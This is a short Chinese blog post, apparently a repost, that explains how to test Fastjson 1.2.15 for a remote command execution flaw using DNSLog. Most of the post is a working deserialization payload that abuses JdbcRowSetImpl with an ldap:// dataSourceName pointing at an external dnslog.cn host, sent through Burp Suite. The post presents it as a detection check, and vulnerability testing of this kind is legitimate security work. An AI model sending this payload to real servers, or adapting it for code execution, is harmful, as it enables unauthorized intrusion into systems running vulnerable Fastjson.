利用DNSLOG测试Fastjson远程命令执行漏洞

  由于内容比较简单,我直接贴图,怕我自己忘了。

  测试Fastjson版本号:1.2.15

  直接发送用burpsuite发送payload,将dataSourceName改成dnslog获取到的域名。

  payload:

{

    "a":{

        "@type":"java.lang.Class",

        "val":"com.sun.rowset.JdbcRowSetImpl"

    },

    "b":{

        "@type":"com.sun.rowset.JdbcRowSetImpl",

        "dataSourceName":"ldap://6v0jfv.dnslog.cn

",

        "autoCommit":true

    }

}

  若刷新DNSlog有记录增加,那说明漏洞存在,反之,则不存在。

 

如有错误,请及时指正,谢谢!

原文地址:https://www.cnblogs.com/4wheel/p/13432412.html